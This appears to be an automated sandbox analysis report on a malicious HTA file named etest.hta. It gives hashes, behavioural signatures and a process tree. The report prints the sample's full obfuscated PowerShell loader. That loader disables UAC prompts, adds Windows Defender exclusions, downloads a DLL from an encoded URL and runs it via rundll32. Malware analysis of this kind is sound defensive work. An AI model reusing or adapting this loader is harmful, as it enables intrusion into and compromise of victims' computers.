Analysis
-
max time kernel
424s -
max time network
430s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-06-2022 16:06
Static task
static1
Behavioral task
behavioral1
Sample
etest.hta
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
General
-
Target
etest.hta
-
Size
99KB
-
MD5
84df3cea303f0410a2a70580b9155bf5
-
SHA1
987eed81fa0822853cb9f826994e75102e086694
-
SHA256
248b6a65b656872525904122e75bd374b772e27c2a8fc6040ec6582fd207e536
-
SHA512
610b39ec2989225794d0b12ef451bddc4bc4f3f77cd2159d9396ca425524256f17ea12b17957070a94704b5aa1a0b5fe5f915dd9d3c610aecc767315e1977616
Malware Config
Signatures
-
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1580 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 1664 wrote to memory of 1580 1664 mshta.exe powershell.exe PID 1664 wrote to memory of 1580 1664 mshta.exe powershell.exe PID 1664 wrote to memory of 1580 1664 mshta.exe powershell.exe PID 1664 wrote to memory of 1580 1664 mshta.exe powershell.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe PID 1580 wrote to memory of 424 1580 powershell.exe rundll32.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\etest.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function BpCExIjDrdGi($nnVDyzh, $cfMRXTCG){[IO.File]::WriteAllBytes($nnVDyzh, $cfMRXTCG)};function BgqJOAPBzie($nnVDyzh){if($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66896,66904,66904))) -eq $True){rundll32.exe $nnVDyzh ,RunObject }elseif($nnVDyzh.EndsWith((fibYakKGHnxcX @(66842,66908,66911,66845))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $nnVDyzh}else{Start-Process $nnVDyzh}};function YDwYoXfkvCiX($BUsiXmWVUTyBGlhNN){$uTDDSkKDrMcCukgsB = New-Object (fibYakKGHnxcX @(66874,66897,66912,66842,66883,66897,66894,66863,66904,66901,66897,66906,66912));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cfMRXTCG = $uTDDSkKDrMcCukgsB.DownloadData($BUsiXmWVUTyBGlhNN);return $cfMRXTCG};function fibYakKGHnxcX($ZPSYkAbHDFF){$vRDpSXA=66796;$ifTikh=$Null;foreach($efauSZiRIFLSvo in $ZPSYkAbHDFF){$ifTikh+=[char]($efauSZiRIFLSvo-$vRDpSXA)};return $ifTikh};function KTcwOeFIaImkX(){$kyNirfktEagoeXnmMr = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$nGDxbpOvNNZvVHtpfa=$env:AppData; Add-MpPreference -ExclusionPath $nGDxbpOvNNZvVHtpfa;Add-MpPreference -ExclusionExtension ?lnk?;$PkAZgfWOTxnZ = $kyNirfktEagoeXnmMr + 'test.dll'; if (Test-Path -Path $PkAZgfWOTxnZ){BgqJOAPBzie $PkAZgfWOTxnZ;}Else{ $SpgGVjW = YDwYoXfkvCiX (fibYakKGHnxcX @(66900,66912,66912,66908,66911,66854,66843,66843,66915,66893,66906,66899,66841,66896,66893,66912,66893,66841,66911,66895,66901,66897,66906,66895,66897,66842,66895,66907,66905,66843,66915,66908,66841,66895,66907,66906,66912,66897,66906,66912,66843,66912,66900,66897,66905,66897,66911,66843,66911,66895,66893,66908,66897,66911,66900,66907,66912,66843,66912,66897,66911,66912,66842,66896,66904,66904));BpCExIjDrdGi $PkAZgfWOTxnZ $SpgGVjW;BgqJOAPBzie $PkAZgfWOTxnZ;};;;;}KTcwOeFIaImkX;" uac2⤵
- UAC bypass
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\test.dll RunObject3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/424-58-0x0000000000000000-mapping.dmp
-
memory/1580-54-0x0000000000000000-mapping.dmp
-
memory/1580-55-0x00000000756E1000-0x00000000756E3000-memory.dmpFilesize
8KB
-
memory/1580-56-0x0000000072150000-0x00000000726FB000-memory.dmpFilesize
5.7MB
-
memory/1580-57-0x0000000072150000-0x00000000726FB000-memory.dmpFilesize
5.7MB
-
memory/1580-60-0x0000000072150000-0x00000000726FB000-memory.dmpFilesize
5.7MB